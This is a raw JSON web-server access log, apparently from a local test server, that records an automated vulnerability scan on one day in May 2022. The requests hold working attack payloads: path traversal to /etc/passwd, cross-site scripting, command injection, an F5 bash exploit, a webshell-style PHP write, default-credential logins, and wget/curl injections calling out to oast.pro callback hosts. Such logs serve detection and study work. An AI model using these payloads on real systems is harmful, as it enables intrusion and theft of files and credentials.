\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lucee/admin/imgProcess.cfm?file=/../../../context/29N5EgcPWgl2P2JLXPqNqvlKksn.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"page=login_change&oper=0&username=admin&password=conel&submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=cat+/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"localhost","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?redirect=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/v1/metadata/private-networks HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.438","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0a/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::1]' UNION SELECT '/","request":"GET /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('29N5EthAevkB2hQ0IjlieJ1TcoK')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/48 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"{\x22O_\x22: \x22A\x22, \x22F_\x22: \x22EXEC_CMD\x22, \x22S_\x22: 123456789, \x22P1_\x22: {\x22Q\x22: \x22cat /etc/passwd\x22, \x22F\x22: \x22EXEC_CMD\x22}, \x22V_\x22: 1}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/libagent.cgi?type=J HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"cmd=id&opts=&timeout=5","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lucee/29N5EgcPWgl2P2JLXPqNqvlKksn.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/resolution HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sess-bin/login_session.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tests/generate.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"browserTime=081119502020¤tTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=29N5EkTUMOrMYVMhu0mHDyeClnJ.php&target=l1_Lw HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0d/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/html2canvasproxy.php?url=https://ca2tuc8smpv1g2s80ca0zuk8g3hr79yn7.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /os/mxperson HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wt3/forceSave.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ioncube/loader-wizard.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('29N5EthAevkB2hQ0IjlieJ1TcoK')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/49 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebConsole/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"Login=admin&Password=12345&Action=AdminLogin&XToken={{token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?/Ajax/&q[]=/0/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.msmtprc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/files/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/operator/fileread?READ.filePath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://ca2tuc8smpv1g2s80ca0kceabm6tzq49o.oast.pro&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_log.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%00/example.com/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.005","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%2229N5Ejj2KPFlP4caxtkUjkoM6Hl%22%3b%20%3f%3e","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /meaweb/os/mxperson HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"{\x0D\x0A \x22headers\x22:{\x0D\x0A \x22X-Real-IP\x22:\x22127.0.0.1\x22,\x0D\x0A \x22Content-Type\x22:\x22application/json\x22\x0D\x0A },\x0D\x0A \x22timeout\x22:1500,\x0D\x0A \x22pipeline\x22:[\x0D\x0A {\x0D\x0A \x22method\x22:\x22PUT\x22,\x0D\x0A \x22path\x22:\x22/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\x22,\x0D\x0A \x22body\x22:\x22{\x5Cr\x5Cn \x5C\x22name\x5C\x22: \x5C\x22test\x5C\x22, \x5C\x22method\x5C\x22: [\x5C\x22GET\x5C\x22],\x5Cr\x5Cn \x5C\x22uri\x5C\x22: \x5C\x22/api/29N5EhsDKWHrXRyWZrKCFOKAGye\x5C\x22,\x5Cr\x5Cn \x5C\x22upstream\x5C\x22:{\x5C\x22type\x5C\x22:\x5C\x22roundrobin\x5C\x22,\x5C\x22nodes\x5C\x22:{\x5C\x22httpbin.org:80\x5C\x22:1}}\x5Cr\x5Cn,\x5Cr\x5Cn\x5C\x22filter_func\x5C\x22: \x5C\x22function(vars) os.execute('curl https://ca2tuc8smpv1g2s80ca0jf3and1afre8c.oast.pro/`whoami`'); return true end\x5C\x22}\x22\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/batch-requests HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loader-wizard.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 